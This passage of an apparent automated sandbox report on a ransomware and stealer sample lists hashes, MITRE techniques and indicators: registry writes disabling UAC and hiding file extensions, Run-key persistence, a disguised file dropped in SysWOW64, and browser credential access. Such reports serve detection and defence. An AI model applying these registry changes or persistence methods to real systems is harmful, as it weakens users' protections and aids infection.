1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
04/07/2024, 19:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
Size

111KB
MD5

ecd09b5545b83ee4679295a86c3cf64e
SHA1

3cd8e83e497f1bcffb67f97c5aa4929fc9e977bd
SHA256

1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
SHA512

16f3081c9d077da9e88591d9cbdbceb853c25f978980cc0407aed3d6787632e831b56d5387b8090f84b612e15f1c33e671a7cba6f240c9e7ce58b7bc4c5b6e2f
SSDEEP

3072:irPItAetVb1OIzS8yYjiZr1/1z7rWbayiFMv3laXNqvhAkY:irQtAezH5yYjiZr1/1yzt9a3k

Score

10^/10

evasion persistence ransomware spyware stealer trojan

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

UAC bypass 3 TTPs 64 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Renames multiple (85) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation	aQksIwQY.exe

Executes dropped EXE 2 IoCs

pid	Process
4852	CSkEQQUI.exe
5084	aQksIwQY.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CSkEQQUI.exe = "C:\\Users\\Admin\\FwwcwswQ\\CSkEQQUI.exe"	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\aQksIwQY.exe = "C:\\ProgramData\\BuwEMkMQ\\aQksIwQY.exe"	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\aQksIwQY.exe = "C:\\ProgramData\\BuwEMkMQ\\aQksIwQY.exe"	aQksIwQY.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CSkEQQUI.exe = "C:\\Users\\Admin\\FwwcwswQ\\CSkEQQUI.exe"	CSkEQQUI.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\shell32.dll.exe	aQksIwQY.exe
File opened for modification	C:\Windows\SysWOW64\shell32.dll.exe	aQksIwQY.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
4920	reg.exe
1836	reg.exe
2408	reg.exe
2236	reg.exe
2608	reg.exe
920	reg.exe
4788	reg.exe
4440	reg.exe
3892	reg.exe
1448	reg.exe
1652	reg.exe
2972	reg.exe
4636	reg.exe
4360	reg.exe
2368	reg.exe
336	reg.exe
4312	reg.exe
3424	reg.exe
4116	reg.exe
1320	reg.exe
2424	reg.exe
1452	reg.exe
4712	reg.exe
640	reg.exe
3968	reg.exe
1824	reg.exe
4524	reg.exe
2172	reg.exe
2388	reg.exe
1596	reg.exe
548	reg.exe
4360	reg.exe
3752	reg.exe
3348	reg.exe
2868	reg.exe
1936	reg.exe
3496	reg.exe
1948	reg.exe
644	reg.exe
3192	reg.exe
3776	reg.exe
1080	reg.exe
1520	reg.exe
400	reg.exe
2288	reg.exe
2392	reg.exe
4164	reg.exe
4108	reg.exe
1400	reg.exe
1824	reg.exe
3996	reg.exe
1544	reg.exe
1184	reg.exe
3856	reg.exe
1320	reg.exe
892	reg.exe
3548	reg.exe
3000	reg.exe
4260	reg.exe
4788	reg.exe
4920	reg.exe
2288	reg.exe
4364	reg.exe
2388	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
3672	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
4652	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
2564	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
892	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
892	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
892	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
892	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
556	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
556	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
556	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
556	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
2892	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
2892	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
2892	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
2892	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
4156	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
4156	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
4156	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
4156	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
1556	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
1556	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
1556	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
1556	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
3092	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
3092	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
3092	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
3092	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
5012	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
5012	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
5012	1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
